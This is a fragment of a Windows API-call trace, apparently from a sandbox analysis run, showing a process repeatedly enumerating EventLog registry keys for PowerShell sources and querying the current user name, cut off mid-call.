[0253.864] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.865] CoTaskMemFree (pv=0x3220d0) [0253.865] CoTaskMemFree (pv=0x0) [0253.865] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.865] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.866] CoTaskMemFree (pv=0x3220d0) [0253.866] CoTaskMemFree (pv=0x0) [0253.866] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.866] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.867] CoTaskMemFree (pv=0x3220d0) [0253.867] CoTaskMemFree (pv=0x0) [0253.867] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.867] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.867] CoTaskMemFree (pv=0x3220d0) [0253.867] CoTaskMemFree (pv=0x0) [0253.867] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.867] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.869] CoTaskMemFree (pv=0x3220d0) [0253.869] CoTaskMemFree (pv=0x0) [0253.869] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.869] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.870] CoTaskMemFree (pv=0x3220d0) [0253.870] CoTaskMemFree (pv=0x0) [0253.870] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.870] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.871] CoTaskMemFree (pv=0x3220d0) [0253.871] CoTaskMemFree (pv=0x0) [0253.871] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.871] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.871] CoTaskMemFree (pv=0x3220d0) [0253.871] CoTaskMemFree (pv=0x0) [0253.871] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0253.871] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x3220d0, lpcchName=0x16cf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16cf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0253.872] CoTaskMemFree (pv=0x3220d0) [0253.872] CoTaskMemFree (pv=0x0) [0253.872] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x1c8) returned 0x0 [0253.872] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0253.872] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x330) returned 0x0 [0253.872] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0253.872] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x334) returned 0x0 [0253.872] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0253.873] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x338) returned 0x0 [0253.873] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0253.873] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x33c) returned 0x0 [0253.873] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0253.873] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x340) returned 0x0 [0253.873] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0253.873] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x5 [0254.051] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x344) returned 0x0 [0254.051] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x0) returned 0x2 [0254.051] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x348) returned 0x0 [0254.052] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf78 | out: phkResult=0x16cf78*=0x34c) returned 0x0 [0254.052] RegCloseKey (hKey=0x34c) returned 0x0 [0254.052] RegCloseKey (hKey=0x324) returned 0x0 [0254.053] RegCloseKey (hKey=0x348) returned 0x0 [0254.075] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0254.075] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0254.076] CoTaskMemFree (pv=0x1ba607f0) [0254.077] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.077] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0254.078] CoTaskMemFree (pv=0x3220d0) [0254.355] CoTaskMemFree (pv=0x0) [0254.355] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.355] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.355] CoTaskMemFree (pv=0x3220d0) [0254.355] CoTaskMemFree (pv=0x0) [0254.355] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.355] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.355] CoTaskMemFree (pv=0x3220d0) [0254.355] CoTaskMemFree (pv=0x0) [0254.355] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.355] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.355] CoTaskMemFree (pv=0x3220d0) [0254.355] CoTaskMemFree (pv=0x0) [0254.355] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.355] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.356] CoTaskMemFree (pv=0x3220d0) [0254.356] CoTaskMemFree (pv=0x0) [0254.356] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.356] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.356] CoTaskMemFree (pv=0x3220d0) [0254.356] CoTaskMemFree (pv=0x0) [0254.356] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.356] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.356] CoTaskMemFree (pv=0x3220d0) [0254.356] CoTaskMemFree (pv=0x0) [0254.356] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.356] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.356] CoTaskMemFree (pv=0x3220d0) [0254.356] CoTaskMemFree (pv=0x0) [0254.356] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.356] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.356] CoTaskMemFree (pv=0x3220d0) [0254.356] CoTaskMemFree (pv=0x0) [0254.356] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.356] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.356] CoTaskMemFree (pv=0x3220d0) [0254.356] CoTaskMemFree (pv=0x0) [0254.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x36c) returned 0x0 [0254.372] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.372] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x370) returned 0x0 [0254.372] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x374) returned 0x0 [0254.372] RegCloseKey (hKey=0x374) returned 0x0 [0254.373] RegCloseKey (hKey=0x350) returned 0x0 [0254.373] RegCloseKey (hKey=0x370) returned 0x0 [0254.374] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cec8 | out: phkResult=0x16cec8*=0x370) returned 0x0 [0254.374] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16ce3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16ce38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16ce3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16ce38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.374] CoTaskMemFree (pv=0x0) [0254.374] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.374] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.374] CoTaskMemFree (pv=0x3220d0) [0254.374] CoTaskMemFree (pv=0x0) [0254.374] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.374] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.374] CoTaskMemFree (pv=0x3220d0) [0254.374] CoTaskMemFree (pv=0x0) [0254.374] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.374] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.374] CoTaskMemFree (pv=0x3220d0) [0254.374] CoTaskMemFree (pv=0x0) [0254.374] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.374] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.374] CoTaskMemFree (pv=0x3220d0) [0254.374] CoTaskMemFree (pv=0x0) [0254.374] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.374] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.374] CoTaskMemFree (pv=0x3220d0) [0254.374] CoTaskMemFree (pv=0x0) [0254.374] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.375] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.375] CoTaskMemFree (pv=0x3220d0) [0254.375] CoTaskMemFree (pv=0x0) [0254.375] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.375] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.375] CoTaskMemFree (pv=0x3220d0) [0254.375] CoTaskMemFree (pv=0x0) [0254.375] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.375] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.375] CoTaskMemFree (pv=0x3220d0) [0254.375] CoTaskMemFree (pv=0x0) [0254.375] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.375] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x3220d0, lpcchName=0x16cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.375] CoTaskMemFree (pv=0x3220d0) [0254.375] CoTaskMemFree (pv=0x0) [0254.375] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x350) returned 0x0 [0254.375] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.375] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x374) returned 0x0 [0254.375] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.375] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x378) returned 0x0 [0254.376] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.376] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x37c) returned 0x0 [0254.376] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.376] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x380) returned 0x0 [0254.376] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.376] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x384) returned 0x0 [0254.376] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.376] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x5 [0254.389] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x388) returned 0x0 [0254.389] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x0) returned 0x2 [0254.389] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x38c) returned 0x0 [0254.390] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf28 | out: phkResult=0x16cf28*=0x390) returned 0x0 [0254.390] RegCloseKey (hKey=0x390) returned 0x0 [0254.390] RegCloseKey (hKey=0x370) returned 0x0 [0254.390] RegCloseKey (hKey=0x38c) returned 0x0 [0254.392] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ce98 | out: phkResult=0x16ce98*=0x38c) returned 0x0 [0254.392] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16ce0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16ce08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16ce0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16ce08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.392] CoTaskMemFree (pv=0x0) [0254.392] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.392] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.392] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.393] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.393] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.393] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.393] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.393] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.393] CoTaskMemFree (pv=0x3220d0) [0254.393] CoTaskMemFree (pv=0x0) [0254.393] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.393] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.394] CoTaskMemFree (pv=0x3220d0) [0254.394] CoTaskMemFree (pv=0x0) [0254.394] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.394] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x3220d0, lpcchName=0x16ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0254.394] CoTaskMemFree (pv=0x3220d0) [0254.394] CoTaskMemFree (pv=0x0) [0254.394] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x370) returned 0x0 [0254.394] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.394] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x390) returned 0x0 [0254.394] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, 